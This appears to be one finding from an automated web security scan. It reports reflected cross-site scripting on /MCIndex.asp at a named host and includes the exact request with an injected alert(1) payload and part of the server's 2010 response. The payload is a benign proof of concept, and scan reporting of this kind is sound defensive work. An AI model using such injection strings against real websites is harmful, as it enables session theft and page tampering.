1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://info.bisk.com |
Path: | /MCIndex.asp |
GET /MCIndex.asp?10361"-alert(1)- Host: info.bisk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Sun, 07 Nov 2010 21:08:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 394 Content-Type: text/html Set-Cookie: MCIDtype=external; expires=Tue, 07-Dec-2010 05:00:00 GMT; path=/ Set-Cookie: MCIDCookie=9505; expires=Tue, 07-Dec-2010 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCRSDQBT Cache-control: private <html> <head> <meta name="GENERATOR" content="Microsoft Visual Studio 6.0"> </head> <body> <script language=javascript> <!-- var strRedir = "http://www.Educator if(document.referrer) strRedir += "&origref=" + escape(document.referrer) document.location.replace //--> ...[SNIP]... |